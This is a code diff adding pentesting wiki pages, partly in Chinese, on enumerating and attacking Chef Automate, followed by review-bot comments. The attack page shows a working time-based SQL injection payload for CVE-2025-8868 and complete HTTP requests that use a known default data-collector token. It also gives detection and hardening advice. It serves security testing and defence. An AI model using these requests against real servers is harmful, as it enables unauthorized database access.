diff --git a/src/pentesting-ci-cd/chef-automate-security/README.md b/src/pentesting-ci-cd/chef-automate-security/README.md new file mode 100644 index 000000000..e0a46e618 --- /dev/null +++ b/src/pentesting-ci-cd/chef-automate-security/README.md @@ -0,0 +1,18 @@ +# Chef Automate 安全 + +{{#include ../../banners/hacktricks-training.md}} + +## 什么是 Chef Automate + +Chef Automate 是一个用于基础设施自动化、合规性和应用交付的平台。它暴露一个 web UI(通常为 Angular),通过 gRPC-Gateway 与后端 gRPC services 通信,提供类似 REST 的端点,路径例如 /api/v0/。 + +- 常见的后端组件: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service +- 认证机制: user/API tokens and a data collector token header x-data-collector-token + +## Enumeration & Attacks + +{{#ref}} +chef-automate-enumeration-and-attacks.md +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md new file mode 100644 index 000000000..67d0593af --- /dev/null +++ b/src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md 
@@ -0,0 +1,142 @@ +# Chef Automate Enumeration & Attacks + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +本页汇集了针对 Chef Automate 实例进行枚举和攻击的实用技术,重点包括: +- 发现 gRPC-Gateway-backed REST endpoints 并通过 validation/error responses 推断请求 schema +- 在存在默认值时滥用 x-data-collector-token 认证头 +- 在 Compliance API 中的 Time-based blind SQL injection(CVE-2025-8868),影响 /api/v0/compliance/profiles/search 中的 filters[].type 字段 + +> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services. + +## Recon: Architecture and Fingerprints + +- Front-end: Often Angular。静态 bundle 可以提示 REST 路径(例如 /api/v0/...) +- API transport: REST to gRPC via gRPC-Gateway +- Responses may include grpc-metadata-content-type: application/grpc +- Database/driver fingerprints: +- Error bodies starting with pq: 强烈提示使用 PostgreSQL 和 Go pq driver +- Interesting Compliance endpoints (auth required): +- POST /api/v0/compliance/profiles/search +- POST /api/v0/compliance/scanner/jobs/search + +## Auth: Data Collector Token (x-data-collector-token) + +Chef Automate 暴露了一个 data collector,通过专用头对请求进行认证: + +- Header: x-data-collector-token +- Risk: 某些环境可能保留默认 token,从而获得对受保护 API 路由的访问权限。已在野外观察到的已知默认值: +- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +如果存在,该 token 可用于调用本应受 auth 限制的 Compliance API 端点。强化时务必尝试轮换/禁用默认值。 + +## API Schema Inference via Error-Driven Discovery + +gRPC-Gateway-backed 端点经常 leak 有用的 validation 错误,这些错误会描述期望的请求模型。 + +For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with: + +- type: string (filter field identifier) +- values: array of strings + +Example request shape: +```json +{ +"filters": [ +{ "type": "name", "values": ["test"] } +] +} +``` +格式错误的 JSON 或字段类型不正确通常会触发带有提示的 4xx/5xx 响应,且响应头会显示 gRPC-Gateway 的行为。使用这些信息映射字段并定位注入面。 + +## 合规 API SQL Injection (CVE-2025-8868) + +- 受影响的端点: POST 
/api/v0/compliance/profiles/search +- 注入点: filters[].type +- 漏洞类别: time-based blind SQL injection in PostgreSQL +- 根本原因: 在将 type 字段插入到动态 SQL 片段(可能用于构建 identifiers/WHERE clauses)时,缺乏正确的 parameterization/whitelisting。type 中的构造值会被 PostgreSQL 评估。 + +有效的 time-based payload: +```json +{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]} +``` +技术说明: +- 用单引号关闭原始字符串 +- 连接一个调用 pg_sleep(N) 的子查询 +- 通过 || 重新进入字符串上下文,以便无论 type 嵌入何处,最终的 SQL 都保持语法有效 + +### 通过差分延迟验证 + +发送成对请求并比较响应时间以验证服务器端执行: + +- N = 1 秒 +``` +POST /api/v0/compliance/profiles/search HTTP/1.1 +Host: +Content-Type: application/json +x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]} +``` +- N = 5 秒 +``` +POST /api/v0/compliance/profiles/search HTTP/1.1 +Host: +Content-Type: application/json +x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506 + +{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]} +``` +Observed behavior: +- Response times scale with pg_sleep(N) +- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths + +> Tip: 使用 timing validator(例如,多次试验并用统计比较)来减少噪声和误报。 + +### Impact + +Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry. 
+ +### Affected versions / Fix + +- CVE: CVE-2025-8868 +- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories + +## Detection and Forensics + +- API layer: +- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep +- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows +- Database layer (PostgreSQL): +- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver) +- Authentication: +- Log and alert on usage of x-data-collector-token, especially known default values, across API paths + +## Mitigations and Hardening + +- Immediate: +- Rotate/disable default data collector tokens +- Restrict ingress to data collector endpoints; enforce strong, unique tokens +- Code-level: +- Parameterize queries; never string-concatenate SQL fragments +- Strictly whitelist allowed type values on the server (enum) +- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists + +## Practical Testing Checklist + +- Check if x-data-collector-token is accepted and whether the known default works +- Map the Compliance API request schema by inducing validation errors and reading error messages/headers +- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields +- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts + +## References + +- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate) +- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/) +- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868) +- 
[gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway) +- [pq PostgreSQL driver for Go](https://github.com/lib/pq) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index f056330cf..63ccf9685 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -1,5 +1,3 @@ -# GCP - Post Exploitation - -{{#include ../../../banners/hacktricks-training.md}} +# GCP - 后渗透 {{#include ../../../banners/hacktricks-training.md}}
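Review bot: In the new `src/pentesting-ci-cd/chef-automate-security/README.md` the translation is only partial: the page heading is `# Chef Automate 安全` and the first section is `## 什么是 Chef Automate`, but the second heading stays English (`## Enumeration & Attacks`) and both list items switch to English after the colon (`- 常见的后端组件: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service`). Either keep the whole file in one language or translate the list bodies and heading as well, e.g. `## 枚举与攻击` and `- 认证机制: 用户/API token,以及 data collector 的 token 请求头 x-data-collector-token`, leaving only the header name and product identifiers untranslated. Since this README is the landing page that points readers at the enumeration page via `{{#ref}}`, a one-line pointer to the hardening advice (rotate the default data-collector token) would also help readers who never open the second file.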
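Review bot: In `chef-automate-enumeration-and-attacks.md` the two HTTP examples under `### 通过差分延迟验证` ship with an empty `Host:` header and with the known default data-collector token pasted in as a live header value; use placeholders there (`Host: <automate-host>` and `x-data-collector-token: <token>`) so the examples are copy-safe and the default value appears exactly once, under `## Auth: Data Collector Token`, next to the rotate/disable guidance. Two further points in the same hunk: the nested bullets in `## Recon: Architecture and Fingerprints` and `## Detection and Forensics` are written at the same indent as their parents (`- Database/driver fingerprints:` is followed by `- Error bodies starting with pq: ...` at top level), so they render as siblings rather than sub-items; indent them. And the detection guidance only watches `500`s on `/api/v0/compliance/profiles/search`, yet the page itself states that `Response times scale with pg_sleep(N)` and that `pq:` details appear only `during probing`; a successful timing probe returns normally, so add a latency-based rule on that endpoint (requests whose duration clusters at the injected `N`) alongside the status-code rule, and alert on any use of the default token value regardless of path. Minor: the heading `### Affected versions / Fix` gives only the fixed version (`4.13.295 or later`) and no affected range, so either add the range from the advisory or rename the heading to `### Fix`; and the file mixes English headings (`# Chef Automate Enumeration & Attacks`) with Chinese body text, the same inconsistency as the README.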
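Review bot: The GCP hunk (`@@ -1,5 +1,3 @@` in `gcp-post-exploitation/README.md`) does more than translate the title: besides `-# GCP - Post Exploitation` / `+# GCP - 后渗透`, it also removes one `{{#include ../../../banners/hacktricks-training.md}}` line while a second include remains as trailing context, i.e. the old file carried two consecutive banner includes and the change drops the duplicate. Removing the duplicate is fine, but it is an unrelated cleanup bundled into a translation change and should be named in the change description so it is not mistaken for an accidental deletion; the hunk shows nothing else of the file, so the reviewer cannot confirm the bottom-of-page include (present in the two new Chef pages) is still there.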